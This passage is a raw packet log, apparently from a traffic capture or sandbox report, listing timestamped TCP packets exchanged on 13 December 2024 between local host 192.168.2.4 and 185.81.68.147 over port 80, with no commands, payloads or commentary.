                                                              Dec 13, 2024 07:47:06.521234989 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.613078117 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.613166094 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.614128113 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.614128113 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.614366055 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.614500046 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.614620924 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.614620924 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.616638899 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.616738081 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.616785049 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.616785049 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.619462013 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.619515896 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.619586945 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.619586945 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.622200966 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.622296095 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.622319937 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.622345924 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.624967098 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.625020027 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.625026941 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.625349045 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.627660990 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.627787113 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.627871037 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.627871037 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.630362034 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.630415916 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.631331921 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.632960081 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.633022070 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.633063078 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.633136034 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.635466099 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.635586977 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.635648966 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.635648966 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.637994051 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.638048887 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.638098001 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.638155937 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.640548944 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.640583992 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.640969992 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.640969992 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.642898083 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.643006086 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.643059969 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.643059969 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.645359039 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.645463943 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.645670891 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.645670891 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.647795916 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.647850037 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.647897959 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.648425102 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.650125027 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.650229931 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.650242090 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.650275946 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.652550936 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.652617931 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.652628899 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.652705908 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.654855013 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.654918909 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.654969931 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.655102968 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.657210112 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.657329082 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.657370090 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.657387018 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.659564018 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.659681082 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.659702063 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.659734011 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.661964893 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.662020922 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.662062883 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.662343025 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.664311886 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.664422035 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.664428949 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.664475918 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.666769981 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.666821003 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.666929960 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.669104099 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.669194937 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.669209957 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.669774055 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.671435118 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.671530008 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.671564102 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.671629906 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.673834085 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.673907042 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.673913002 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.673964977 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.676148891 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.676217079 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.676649094 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.676649094 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.678563118 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.678642988 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.678760052 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.678760052 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.680893898 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.680972099 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.680999041 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.681492090 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.683247089 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.683340073 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.683378935 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.683430910 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.685616970 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.685746908 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.685775995 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.685827971 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.688076973 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.688133001 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.688175917 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.688220978 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.690444946 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.690555096 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.690768003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.690768003 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.692744970 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.692852020 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.692902088 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.692902088 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.695169926 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.695238113 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.695333958 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.695333958 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.697498083 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.697623968 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.698570013 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.698570013 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.699863911 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.699915886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.699965954 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.700066090 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.702218056 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.702299118 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.702306032 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.702354908 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.704570055 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.704679966 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.704682112 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.704807043 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.706908941 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.706967115 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.707020998 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.707106113 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.709314108 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.709423065 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.709474087 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.709474087 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.711832047 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.711893082 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.711893082 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.711966991 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.714121103 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.714186907 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.714277983 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.714340925 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.716419935 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.716511965 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.716555119 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.716684103 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.718801022 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.718980074 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.718982935 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.719057083 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.721162081 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.721281052 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.721340895 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.721340895 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.723511934 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.723571062 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.723628044 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.723683119 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.725953102 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.726027012 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.726067066 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.726067066 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.728323936 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.728382111 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.728434086 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.728476048 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.730638027 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.730710030 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.730748892 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.730834961 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.733042955 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.733103037 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.733201027 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.733993053 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.735363960 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.735416889 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.735444069 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.735482931 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.737653017 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.737708092 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.804867029 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.804996967 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.805018902 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.805047035 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.805799007 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.805852890 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.805856943 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.805907011 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.806803942 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.806898117 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.806906939 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.806965113 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.808007956 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.808063984 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.808064938 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.808118105 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.809818029 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.809912920 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.809981108 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.810065031 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.811691999 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.811763048 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.811880112 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.811981916 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.814758062 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.814810038 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.814877987 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.815378904 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.815527916 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.815581083 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.815581083 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.815581083 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.817182064 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.817243099 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.817327023 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.817377090 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.818989992 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.819051981 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.819135904 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.819192886 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.820663929 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.820732117 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.820791006 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.820864916 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.822405100 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.822460890 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.822532892 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.822628975 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.824129105 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.824189901 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.824271917 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.824423075 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.825850010 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.825906992 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.825932026 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.826328993 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.827505112 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.827583075 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.827620983 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.827677965 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.829202890 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.829307079 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.829319000 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.829726934 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.830852032 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.830912113 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.830992937 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.831051111 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.832489014 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.832608938 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.832648039 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.832648039 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.834140062 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.834256887 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.834306002 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.834306002 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.835777044 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.835866928 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.835907936 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.835964918 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.837376118 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.837431908 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.837537050 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.837598085 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.838958025 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.839050055 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.839119911 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.839119911 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.840497971 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.840559006 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.840567112 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.840619087 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.842067957 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.842124939 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.842178106 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.842231035 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.843641043 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.843719006 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.843758106 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.843854904 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.845153093 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.845212936 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.845283031 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.845336914 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.846714020 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.846788883 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.847011089 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.847011089 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.848196030 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.848324060 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.848411083 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.848411083 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.849740028 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.849798918 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.849855900 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.849939108 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.851232052 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.851334095 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.851346970 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.851403952 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.852683067 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.852798939 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.852838993 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.852838993 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.854150057 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.854254007 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.854280949 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.854341030 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.855613947 CET8049738185.81.68.147192.168.2.4
                                                              Dec 13, 2024 07:47:06.855710030 CET4973880192.168.2.4185.81.68.147
                                                              Dec 13, 2024 07:47:06.855751038 CET8049738185.81.68.147192.168.2.4
